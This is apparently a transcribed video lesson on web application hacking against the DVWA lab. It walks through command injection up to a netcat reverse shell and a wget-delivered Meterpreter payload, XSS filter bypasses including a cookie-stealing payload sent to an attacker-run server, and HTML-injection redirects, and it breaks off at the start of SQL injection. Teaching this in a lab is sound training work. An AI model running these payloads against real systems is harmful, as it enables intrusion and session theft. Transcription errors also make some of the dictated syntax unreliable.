arrow and click on low. Now, so you can see everything better, I'm going to zoom all of this in, and once you set the security level to be low, you want to click on submit. Great. Now let's go back to our command injection. So, as we can see, it tells us that we can ping an IP address for free. So, All we need to do is enter an IP address and it will give us a result of whether it is offline or not. Let's give it a try. If I type, for example, the IP address of my router, which is 192.168.1.1, and I click on submit, let us see what it will tell us. And here is the output. It seems to work and it gives correct results. My router is indeed up and running. But if you take a closer look at this output that we got right here, it seems that this is the same output that we get when running ping command inside of a terminal, right? So if I go to my Cal Linux machine and I open the terminal and I type the command ping 192.168.1.1 and I only want to ping it 3 times, if I press enter, well, we pretty much get the same result right here. It will ping my router 3 times and it will give us a similar output to our Metasploitable page. What does this mean? Well, it most likely means that this web page forwards the command to the server, which in our case is our Metasploitable machine, and then that machine executes ping command to determine whether that IP is up or not. Another cool thing that we get with this page is if I scroll down here, we can see view source, and this is the source code to this page. So we can see whether they filter the input or not. But let us not check source code yet. Let's not cheat and let's just try to execute command injection and get it to work. So how are we going to do that? Well, we can try to execute 2 commands inside of this input bar right here. It does ask us for an IP, but we can also try to concat another command after we specify an IP address. For example, if I type 192.168.1.1 and I type dot and comma to separate the commands, and after it I type ls-la, which stands for list all including hidden files, and I click on submit, and it works. It gave us both results from the both commands back. It pinged the router first, and after it, it executed the ls command, and we can see what files our target has. This means there is command injection vulnerability. Because this is something that we shouldn't be able to do. We shouldn't be able to execute other commands outside of this ping command. So let us try different commands as well. So let us enter the same IP address, then dot and comma, and then who am I, for example. And it does give us the output of that as well. We're www-data. Okay, but how can we exploit this and gain access to the target with the help of this command injection? It's quite simple, actually. We can use Netcat for that. So if we start listener in our Cal Linux terminal, if I go right here and type nc-lvp, and then I'm going to use the good old 12345 port, I start my listener right here, and I go back to this page and run the following command. So I type the IP address, then dot and comma, and then nc-e, where I tell it that I want to execute /bin/bash, and I after it specify the IP address of my Cal Linux machine, which in this case is, let me just check it out, 192.168.1.9. So I specify it right here, 168.1.9, and the port is going to be 12345, which is the same port from our listener. I click on submit, and if I go back to our terminal, we got the connection right here. So we exploited the command injection vulnerability. We can run the commands, type ls, go back and switch through the other directories, and we can check out all the other files. Here is the password file, so we can also check out the passwords. We can check out other commands as well, and everything works great. We exploited this target. Let us exit out of this, and now that we successfully exploited this vulnerability, we can take a look at what the source code was. So let's go down here, click on view source, and if I enlarge all of this, so we can see it a little bit better, if we take a look at it, we will see that it didn't really filter any user input. They just requested the IP that the user inputs, and they forwarded that IP address to the ping command right here and right here without any filtering whatsoever. That was a big mistake, since because of this we were able to gain access to the target system. Now let's give it a try on a medium security level and let's see whether we can exploit it then. So I'm going to close this source code, go back to DBA security and change from low to medium. Click on submit, and now the security level is medium. Let's go back to the command injection, and now that it is on medium level, let's give it a try. Let's just start with the same thing that we did previously and try to execute the ls command. So if I go right here, type 192.168.1.1 and then dot and comma, and then for example ls-la. If I click on submit, well, nothing seems to happen. It doesn't seem to work anymore. However, luckily this dot and comma aren't the only ways we can run two commands. If I go to my terminal, if you type for example ls.whoami, it will execute both of these commands, so it will give us the output of these commands and then Mr. Hacker as well. But you can also do it like this. Specify these two signs and then whoami, and it will do exactly the same thing. So let's give it a try like this. Maybe they filtered this character, but they didn't filter it like this. If I go here and type 192.168.1.1 and then these two signs and then for example ls-la once again, click on submit, and this will do the same thing. It will still not work. Okay, let's do the same thing but just delete one of these signs that we put right here. If I show you right here, copy the same command, paste it right here, and I remove one sign, it will once again execute both of these commands, just as two different processes. So it might execute one before another, however it will execute both of them. Let us go right here and give it a try, 192.168.1.1 and then one of these signs and then ls-la. Click on submit and it works. We get the output of both ping commands and the output of all of the files inside of the current directory on the target system. So first two tries didn't work, probably because those characters were getting filtered and blocked, but if we specify it like this here, then it seems to work. It seems to bypass any security and it executes our second command. So if I go down here and we take a look at the source code, I enlarge this so we can see the entire code. It seems that they created some type of a blacklist right here. So they removed these characters and this character right here. So anyone that tries to specify a command injection with these characters, it will not work. That's why this is medium security level, and you need to go through a few more commands in order to bypass this. However, it is still bad because they filter some characters out, but others they don't filter at all. For example, besides this one character that we used, we can also exploit it using the pipe character. So I can type 192.168.1.1 and then the pipe, which is this upper line, and then after it I specify ls-la. And this will work as well. As we can see, we get the output of ls-la command. Great. Now, if we were to change the security level to high, I think I read somewhere that high is an example of how the code should be written, so it isn't really exploitable. You can change it right here, you can submit, and you can go to the command execution and check out the source code right here. It seems to only require the integers, and it checks whether all of your inputs are integers, and it splits the IP address into 4 octets. It does that first, it splits it right here, and it checks if every octet is an integer, and if it is an integer, then it combines those octets once again back, and it pings that target. Okay, so we have covered command injection vulnerability, and now you know how to try to find it and exploit it. In the next video, we're going to move on to the next vulnerability. See you there. Okay, so we have covered command injection, but you can combine this vulnerability with other tools as well. For example, in the last video, we managed to establish connection using Netcat and command injection vulnerability. But we can improve this by injecting a different payload, such as a Meterpreter shell, or a reverse shell that we coded in Python. The process of doing that is the same, so I will show you how to send a Meterpreter payload to the target and make it execute with command injection. Why would we want to do this? Well, we always want to have the best payload possible. So why would we use Netcat when Meterpreter gives us a lot more useful options to run on the target system? And to do all of that, here are the steps that we must perform. We must first create the payload appropriate for our target, then we must download that payload to our target machine with the help of command injection vulnerability, and at last we must execute that payload also with the help of command injection vulnerability. So, sounds pretty simple, right? Let's figure out what payload we should create first. So to create payload, we need to figure out what do we know about our target. Well, we know that Metasploitable is a Linux 32-bit machine, so we can create a Linux Meterpreter payload. But for this case, I like Python payload a lot better. So let's create a Python Meterpreter shell. Great thing about Linux systems is it comes default with Python, so Python payload is something that we can execute on our target without them having to install any additional software. Let's create it real quick. So I will navigate to my desktop directory, and here I will type msf-b, and I will specify that we want to create Python Meterpreter / reverse TCP. The L host is going to be our IP address, so let's check it out real quick. It is 192.168.1.9, copy it and paste it right here. For the L port, we can use port 6000, for example, and we are going to output this to arrows into tester.py. And I just named the payload tester, but feel free to name it anything that you want. I will press enter here, and this will create our Python payload. Let me go right here, lower this, and while this is creating, make sure that your burp suite is started up. Also make sure that your intercept is turned off, and start up your Firefox and your Metasploitable virtual machine. Okay, so once you do that, here in just a few seconds our payload should be done. And here it is. Now that we got a payload created, we must figure out how can we deliver it to the target system. Of course we will do that using the command injection, but even then the target must be able to download our payload from somewhere, right? For this, we're going to use Apache to web server and host our payload there. Apache comes with Cal Linux already, so we can make it run real quick. To do that, we must first type sudo and then service apache 2 start. It will ask us for the password, we input the password, and this will start our Apache 2 web server. What does this mean? Well, this means that any file that is hosted inside of /var/www/html directory in our Cal Linux will be hosted on our web page to anyone that visits our IP address. Let's first of all visit that directory. So if I go cd var www.html, type ls here, and we got shell.exe from some previous video, which we can delete straight away. And this might require root privileges, so let us just enter root account sudo su and let's delete the shell.exe. And now our directory is empty, so no files are being hosted on our web server. Let's copy our tester, which in my case is in my home directory, Mr. Hacker and desktop, tester.py, and we want to copy it inside of var www and html. And now if we were to go to our Cal Linux machine and visit the IP address of my Cal Linux, which is 192.168.1.9, we are going to see this page that has this file available to download. Great. All we're left to do right now is to execute this file on target system. Let's go to our command injection page on our Metasploitable. And to do that, we visit the IP address of Metasploitable, navigate to dvwa. All of this we already know. Let us enter username and password and go to the command injection. But before we do that, change the security level to either low or medium. Once we do that, inside of the command injection, we can execute the commands as from the previous video. So if I type right here 192.168.1.1 and dot and comma and then ls after it, it will ping the router's IP address and it will also print out the contents of that directory. But we don't want to ping every time, we can just type dot and comma, which will specify that we want to enter a next command, and we can just type ls after it, and this will just give us an output of the ls command. And we won't have to wait for the ping command to finish. Now, let's download our payload using wget command. And wget is something that you can run from a terminal in order to download a specific file from the page or link that you specify. Let me show you inside of terminal first. So right now I'm inside of the /home/mrhacker directory and I don't have the tester.py right here. But if I run the command wget and then 192.168.1.9, which is the IP address of Kali Linux, / and then tester.py, with this link we are accessing this page right here and this file right here, which will tell our terminal that we want to download that file. If I press enter, it will download tester.py, and if I type ls once again, now we have tester.py inside of our home and mrhacker directory. We want to do the same thing on our target machine. So to do that, we can use dot and comma to specify the next command and type the same command, wget 192.168.1.9 /tester.py. I press submit, and if I run the ls command once again, now we have one additional file, which is our payload. So it is there. It is on the target machine right now with the help of command injection. The last step we have to do is to set up a listener inside of MSF console, so let's do that real quick. And after we set up a listener, we must execute our payload. And here is the MSF console. We are already familiar with setting up of the listener. We're going to use exploit multi-handler, and we need to set the payload to be python/meterpreter /reverse_TCP. If I show options, all we want to do is set the L host and L port, and that will be the IP address of Kali Linux, and the L port will be 6000. The same options that we specified inside of MSF Venom. Then I will run this, and all we're left to do right now is to execute this tester.py with the help of command injection. So let's see how we can do that. If I type dot and comma and python tester.py, press enter, this page will load. And these are good news because that would most likely mean that we got the Meterpreter shell open. With the help of Python, we executed our Python program on the target machine and it opened our Meterpreter shell, where we can execute various commands as usual. We can run help command to see what else we can execute, and we can basically perform post-exploitation that we already covered. Great. So this is just another way that you can use command injection to your advantage to spawn a better payload than just a simple netcat command execution. So you can try to test this with our Python payload if you want. Great. Now that we covered the command injection vulnerability, in the next video we're going to go into cross-site scripting vulnerability. See you there. Welcome back. I want to talk about another vulnerability that we mentioned in the theory video, and that is cross-site scripting. If you remember, this is a vulnerability where we execute code due to poor user input filtering. In this attack, it is not the server that is getting targeted, but the users that visit that website. There are three main types of XSS attack. There is reflected XSS, stored XSS, and DOM-based XSS. And in this course, we will be covering first two, which are reflected and stored XSS. But before we do that, let's quickly remind ourselves of scenario as to how this attack looks like. So, the attacker finds an XSS vulnerability, they inject JavaScript code that they want the target to execute inside of their browsers, and then anyone who visits that web page will execute the JavaScript code that you injected. This is an example of stored XSS, where the victim doesn't have to click on any links. All they need to do is to visit the same page on their own, and they will execute that script that you injected. So how does this work? Well, this is possible only in case the script that you injected is getting stored on the server. This would most likely be if there is, for example, a page where you need to type in some type of a comment, and then that comment will show on that page. If that comment input is vulnerable, then you most likely will have a stored XSS, because anyone loading that page after that will load your comment as well, and if your comment was a JavaScript code, they will execute that code. So what does this mean? Well, this means once you inject it, it will stay on the server, and server will host that page with malicious JavaScript code to anyone trying to visit it. On the other hand, reflected XSS is a little bit different. It won't work on anyone that visits the page, it will only work if you send a link with malicious code to someone. In this scenario, the server doesn't store our injected code on their side, so it won't be hosting the page with our code. However, the code injection vulnerability could still exist. If we find it, then we would craft our JavaScript code that we want victims to execute, and we would send those links to anyone that we want. Once they click on the link and open the website page, our JavaScript code will also get executed. Now, these types of attacks are usually used for session stealing or by attackers to mine on targets' PCs and create web botnets. But our goal is to just find the bug itself, and we will demonstrate how cookie stealing works later. Let's get straight into it. Okay, so the thing that we need is our Metasploitable running. I got it already up, and we also need the DVWA page. Make sure that you have burp suite running with intercept turned off, and once you do all of that, you want to navigate to the XSS reflected right here, because this is the first example of XSS that we're going to cover in this video. Another thing that you want to do is you want to set the security level to be low for our first example. And let's give it a try to figure out whether this even has an XSS vulnerability. So what does this application do? Well, here it asks us to input our name. So I'll just go and type here Alexa inside of this input, just to see what happens. So if I click on submit, okay, so it prints out hello Alexa. What a welcoming application, right? And this right here is an example of how it should work. You type in your name, it will welcome you with hello and then your name. However, what happens once we try to inject JavaScript code? The most simple JavaScript code, and what we usually do first once hunting for XSS, is type this code. So let me go in terminal just so you can see it better. So this arrow to the left, then script, arrow to the right, alert, and inside of the brackets we put 1 between single quotes, or you can actually put anything you want, and you close the script tags. And this right here is a JavaScript code. It tells the page to alert us with number 1. And once again you can specify anything between these quotes. So what does this mean? This means it will open that small pop-up window at the top of the page where it should print out 1. And these script tags right here are just a way for us to tell the web page, hey, anything that's inside of these script tags you should read as JavaScript code and not HTML code. And this at the end is just the closed script tag, which is telling the web page here is where JavaScript code ends. This alert is a JavaScript function that will alert whatever is inside of these brackets. So let's give it a try, and let's input this inside of our user input instead of a name. I will copy it, go to my page and paste it right here. So script, alert and closed script. I click on submit, and here it is. We have XSS vulnerability since it ran our code and it opened this small window. We can see it says 1, which is what we alerted. Well, this was pretty easy. Since this was on low settings, we can assume no user input was filtered, therefore we managed to execute this. And as easy as this looks like, there are many pages that are currently on internet that are vulnerable to this type of bug, even with this simple script. And as harmless as this looks, it can be used to do some serious damage on client side, depending on what exactly you send them as JavaScript code. Let me show you what I mean. What you would do after actually creating the XSS vulnerability and finding it, you would copy the code with the JavaScript code that you injected, and anyone that clicks on the link, so I will just simulate right here someone clicking on a link, they click on the link that you sent, they press enter, they will also execute that JavaScript code. As we can see right here, they will also get a pop-up window that says 1. And this is a reflected cross-site scripting attack. Anyone that opens this link will also execute this. They don't have to type the JavaScript code themselves. Now that we did this, let us also take a quick look at the source code of this page. So I will open view source, and here is the PHP code for this specific page. And they just paste our input right here. They don't perform any filtering whatsoever. Now that we covered the low security level, let's try to find XSS in a medium level security to see if it works. So I will close this, go to the DVWA security, and I will change from low to medium. Click on submit, and this will change everything to a medium. So let's go back to XSS reflected, and let's first type the name to see whether it gives the same output. And it does. It prints out hello and then the name. So now let's try the same script that we did with the low security. So open script tags, I will alert 1, and I will close script tags. Click on submit. It seems that they actually remove the script tags. We can only see right here hello alert 1, and it doesn't give us a pop-up window that says 1. This means there is some type of filtering performed onto this page, because we don't get that window and our code doesn't get executed. By the output of our application, we can assume that the filtering performs removing of script tags. And usually this is type of filtering that you will encounter. Why? Well, because script tags automatically mean to the web page that JavaScript code is coming. So some web pages perform filtering just by removing these script tags. But let's see whether they filtered it well enough. They seem to filter script like this, but have they filtered script like this? What if I write it in capital letters? Will that also be filtered? Let's give it a try. If I type script and then alert, and I also close the script with capital letters, click on submit, and here it is. We got it to run once again. So all we had to do was write scripts in capital letters. They only filtered out lower letter case script. Let's make sure that that is the case by going and visiting the source code, and let's see what did they do. And here it is. Inside of the print statement, they used the string replace function onto the script tags and replaced it with empty space. And that is the reason why with the first example we didn't get script printed out, we only got alert 1 printed out, since they removed our script tags. But we managed to bypass this with capital script letters. But what would happen if they, for example, also filtered the capital script letters? Well, then we could do something like this. We could type, and let me write it first in terminal just so you can see it better. We could write something like this, SCR, and then open another, left arrow, script, close right arrow, and then IPT, close another, right arrow, alert 1, and close script tags. And the reason why we are writing script tags like this is because our web page only filters the opening script tags. It only filters this. It doesn't filter closed script tags. So what did we do right here? Why would this work? Well, before I explain it, let me first give it a try onto the web page just to see if it would work. And it does indeed work. So what I essentially did right here is I split this script tag into two pieces. And what the web page does, it only filters out entire script tag. So what the web page would do is it would see this opening bracket, then script and closing bracket, it would remove it, but then we would still be left with a script tag. So if I go right here, and let's pretend that we're the web page, we'll filter out the opening script tag, so let's remove this. And what do we get? Well, we get another opening script tag that won't be removed. And that is why this would work as well. Great. Now let us see the attack where we steal cookies from the person that visits our link. Those cookies could then be used to steal their session and possibly enter their online account on that website if the website session management is also poor. Right now, we will see only how to get that cookie with cross-site scripting. So, to do this, we must first see where are we going to receive the cookie value. So they will execute the code and our code will extract the cookie, but where is it going to send it? For this, we're going to start a small Python HTTP server that we will send the cookie to. So how to do that? Well, we can go inside of our terminal and just type the command python-m and then simple HTTP server and then the port number where we want to host it. Let's say port number 8000. If I press enter, this will start the HTTP server on all interfaces on port 8000. Then the malicious JavaScript code that we want to inject is this right here. I will first write it in another terminal and then we're going to copy it inside of the page. So we must first start with capital script. Because we are on medium level, the regular script won't work. Then we can type document.write, open brackets, then type one single quote, open another left arrow, and image source equals, open double quotes, HTTP / and then the IP address of our Cal Linux machine, and then the port on which we are running that Python server, which in my case is 8000. Then we can add another / and close single quote. After it we add a plus and then document.cookie. After that, space and another plus, and after that comes single quote, space, double quote, close right arrow, another single quote, close bracket, dot and comma, and then the close script tags. Okay, I know what you're thinking. What even is this? And this can be a little bit challenging for someone who never encountered JavaScript before. However, this is just JavaScript syntax. It's just the programming language. And after a few times trying XSS, you will pretty much get used to it and it won't be that weird looking once you write it. Since I assume that for anyone that hasn't encountered this before, this looks pretty terrible. But what we're essentially doing right here is we're opening script tags in capital letters because of the filtering on our page, and then we're writing the document.cookie, which is the cookie session of the user visiting that page and running this code, and sending that to the IP address on port 8000, since that is where we're running our Python server. And here we should get printed out the cookie session ID once someone visits our link with this JavaScript code. And at the end, all we're doing is we're closing the script tags. So let's give it a try and run this in our user input, copy it once again, go to our page and type it here. If I press enter or submit, well, nothing seems to happen right here, but if I go to my web server, here it is. Here is our target's cookie. Here is PHP session ID, and that is the cookie value. It even tells right here that we got the security on medium. And this is something that we might be able to use to steal their session. However, more about that later. For now, we saw how to find an XSS vulnerability in both low and medium security level. As I said, this can be one of the challenging parts of the course. However, if there is anything you don't quite fully get, feel free to post a question so we can clarify it even more and make it understandable. Great. In the next video, we're going to do this same vulnerability, just we're going to see how it would look like if it was a stored XSS. Remember, this what we covered is called reflected XSS, and target will only execute the code if they open the link with our JavaScript code. In the next video, we'll see the vulnerability where the JavaScript code gets stored on the server itself. Welcome back, and it is time that we cover another version of XSS attack, which is called stored XSS. In the previous video, we covered the reflected XSS, and this is pretty much the same thing. It is the same vulnerability, just this time our code will get stored on the server side. And it is more dangerous because everyone that visits that page from the time that we injected our JavaScript code will also run that code. You don't have to send them any link or anything else. The code will run by itself as soon as they visit that page. And we already know where we can find the example of stored XSS, so let us just go to our Metasploitable IP address in the DVWA and let us log in. As usual, make sure that your burp suit is running and make sure that the intercept is turned off. I will zoom this in so we can see everything better, and let us first navigate to the DVWA security and check low right here. After we do that, let us submit and go to the stored XSS. So once again, this is the same vulnerability. We want to inject JavaScript code in user input fields. So what do we got here inside of our application? Well, it asks for name and message. Vulnerability stored cross-site scripting. And why is this stored? Well, if we take a look at down here, it seems that someone already made a comment. Name is test, and the message or comment says this is a test comment. And you might already see why this is stored. It is already on the page, and anyone that visits this page will also see this comment. So this is something that everyone that loads the page will also load this comment as a string. But what happens if we try to, for example, input JavaScript code? Will they also load that? Yes, they will. Let me show you an example. First, let us create a regular comment, so I'm just going to type Alexa and hello there, can you see me? And let's sign guestbook, and we can see right here our comment has been added. So everyone will also be able to see this. But what happens if we, for example, try to inject JavaScript code? Let's go with simple alert script. So script, alert, and if we continue typing, we will notice that we cannot really type anymore in this field. So it could be that this field is limited to only certain amount of characters. So let's just leave that on test, and let's try to inject the code here. If I go onto the script, then alert, and I alert 1, and I close the script tags, here we can input the entire script. So let's sign guestbook, and our JavaScript code executes. There is no user input filtering. Therefore, since we're on low level, we will inject a simple code as alert 1. Now, the good part about this is that now, since this comment has been added to this list, every time we visit that page, every time they will execute our code, or we will execute our code. So we don't have to type it once again, as we had to with XSS reflected. Remember, if we type inside of the reflected a simple alert script, it will execute, but once we change a page and go back to the XSS reflected, there is no code running. However, on stored, we will run this code every time. And that is why it is more dangerous. For example, if you did the same attack as from the previous video where we stole cookies, if you inject that code here, then anyone that visits this page, their cookie will be sent to you. And you can then perform session hijacking or something else if cookies aren't configured correctly. And this will also happen if we log out of the page. For example, if I go log out and I go back, to the page and go back to the access stored, this executes once again. Now, if this starts getting annoying because you want to start testing other examples as well, what you can do is you can go to Setup right here and create or reset database. Once you click on this button, navigate back to access stored, you will no longer have the comments that we added in this video. You will only have this test comment that is there by default. Okay, great. Now let us take a look at the medium level security. So if I go on medium, submit, go back to the access stored, and I try to input right here, it still seems to be limited characters. So we can't type longer words than this. Let's give it a try right here. So script alert 1. And here we can name test. It doesn't work. It seems that we get these slashes before our single quotes. So let's take a look at the source code just to see what is happening inside of our fields. And it tells us right here in the comments that this code right here sanitizes the message input, or in other words, the comment input, and this sanitizes or filters the name input. So it seems that we have this HTML special chars function onto our comment. And usually once you have that, there will be no XSS vulnerability since it filters all the characters that you can use to perform XSS attack. So most likely this part doesn't have any vulnerability. So message input or comment input is not something that we are going to try to attack. But what about this name input? It only has this string replace regular script with empty space, which we saw in the previous video. We can simply just bypass this with capital script tag. But there is another problem that we encounter. We cannot specify more than a couple of characters in the name field. Is that something that we can bypass? Well, if I type like this, I will not be able to type more than this, but if I go and inspect element of this page, I find the name input right here, and I can do that by going right here on dev, navigating to here, navigating to form, then from the form, this table, and I want to select this name input right here. So let us give it a try and see which one it is. It is this first one, and if I click on this last arrow, we can see right here that once we select the name input field, right here we got the max length of 10. Is that something that we can change? Well, let's give it a try. If I select that and instead of 10 I type 100, press enter, and I try to continue typing, well, now it works. We navigated to this field, we found the input name field, and it said the max length was 10, but we just added another 0, and now we can type even more characters. So let's give it a try. Remember, the only filtering that is inside of the name field is the script tag, so let us make it capital. And here we can type anything, since we know that this is most likely not vulnerable to the XSS attack, and if I click on sign guestbook, there it is. Here is our XSS vulnerability. And that is all about stored XSS. It is completely the same as the reflected XSS, just this will get stored on the server page, and anyone will load it once visiting that page. Great. Now that we covered XSS, in the next video I want to talk about a small vulnerability that many penetration testers skip when testing for web application vulnerabilities, and that is called HTML injection. And we're also going to mention why we should never skip checking for the HTML injection. See you in the next video. Welcome back. I want to quickly talk about another vulnerability or a bug, which is called HTML injection. And it is quite similar to the cross-site scripting attack. Just as its name says, in this type of the attack, we're not injecting JavaScript code, but instead we're injecting HTML code. And you might say that that is not really dangerous. However, even though that is correct, HTML injection is still a bug that you should be searching for. Why? Well, if there is an HTML injection in some big company, what an attacker could do is they could change the entire page look. They could add whatever they want to that page, they could post different pictures, they could completely change that web page to their own liking just by injecting HTML code. And that would be pretty bad for that company, because someone else would have a complete control of how that page would look like. So how can we test for that? How can we find HTML injection? Well, you can just go and navigate to the XSS reflected and XSS stored that we covered in previous videos, and we can test for HTML injections here. So usually what you want to test is different HTML tags such as h1, h2 or different header tags, just to see whether your input will be interpreted as HTML code. So let's give it a try. Everything is on low, and if I go right here and just type h1, which is an HTML tag for header size 1, and I type test, close the HTML tag by typing these arrows and then close h1, I click on submit, and we can see it does indeed interpret our input as an HTML code. If we were to type, for example, h2 or h3 and then test once again, this would be smaller size, which is a good enough indication that there is an HTML injection on this page. Now, there is no point of us changing this to medium or high, because this specific input is used for JavaScript attacks, so only JavaScript syntax will be filtered, therefore HTML injection will be the same on medium level security as well. As I mentioned, this is also a bug and it should be reported, because for now we only typed in a small HTML code which changes our input to size 1 header and size 3 header. But what we could also do, for example on a stored page, and let me just reset the database real quick from the previous video where we covered the XSS stored, and if you were to type an HTML injection right here, let's say the name will be test, and here we type this code. Let me first write it inside of a terminal, and then we're going to copy it to this page, just so you can see everything better. So open brackets and then meta HTTP equiv equals open double quotes refresh close double quotes content equals 0 dot and comma, and then space URL equals http://google.com, and then close double quotes and close the tag by typing slash and close right arrow. If we were to inject this code, well, let's just see what would happen. Let's copy this code right here, go to our page and type it here. I click on sign guestbook, and do you see what is happening? It is constantly trying to go to a different page, and it is constantly refreshing that page. It pretty much made the page completely unusable, because we cannot even go up here and type something in. So what we must do is we must change to a different directory such as file inclusion and go and clear our database, or reset the database, because we will not be able to visit the stored, since it will automatically start refreshing the page and trying to visit google.com. However, if we were to type same right here in the reflected, and we were to change, for example, from google.com to facebook.com and click on submit, well, pretty much the same thing would happen, but for some reason it doesn't want to visit facebook.com, and we're going to take a look at why that is. Let us see whether we specified something incorrectly. So URL equals HTTP. Okay, so I've tested it out, and for some reason it doesn't seem to work on Kali Linux browser, but if I go to my Windows 10 machine and I visit the Metasploitable page, and right here I copy the same code that we just sent in our Kali Linux, just we copy it and try it from our Windows 10 machine. I just changed the URL to be bing.com, paste it right here, and click on submit. Well, now it fully redirects our XSS reflected input and the entire page to this ping.com website. Let's give it a try what happens if we do that on the stored. So I type test as name and I type this command right here as a message, and it appears that there is a limitation of characters right here. So what we can do is we can inspect the element, navigate to the body, then let's go and find the message input. So under the form we go table, body, and message input. We check right here, it says that the max length is 50. So what I can do is I can type 500, and now if I go and try to copy this, so I will just delete all of this, paste the code and click sign guestbook. Well, now it actually redirects. So you will see that even when I try to go back and I go, for example, to brute force and again on access stored, it will just load ping.com. So with the help of code injection, we can even redirect pages to different websites. And this is usually what attackers do. So if they find a stored code injection vulnerability, what they will do is they will just inject a redirection link to a different website, possibly a malicious website, or a website where they advertise something or something similar. And every time someone visits a page, for example, they want to go and access stored on our Metasploitable page, well, they just load ping.com. And that is the power of HTML injection vulnerability. So now that we covered this, in the next video, we're going to go on to another big vulnerability, which is called SQL injection. See you there. Welcome back. Let's talk about another big vulnerability in web applications that involves databases, and that is called SQL injection. So we already talked about how this works. So you find a user input on a website that communicates with the database. Usually those inputs are something like usernames or passwords or a page where you're searching for some type of a product. Once you input product, the website communicates with the database to see if it has it. Then the database responds back, and all of that is done with the help of SQL language and SQL queries. But as usual, user input might not be well filtered, and we might be able to inject SQL code there and send our own SQL queries to the database. Maybe on that website there are online accounts and their passwords are stored in a database. If we were to find SQL injection on a website like that, we could potentially extract usernames and passwords of all of the accounts through that SQL injection. This is an example of how an SQL query could look like. It is very similar to English language, and what this statement essentially does is it selects some type of element from a table where some condition is fulfilled. And table is just a part of database. Databases are consisted of tables and columns. Now, I will be real right here. If you're encountering SQL injection for the first time or SQL language for the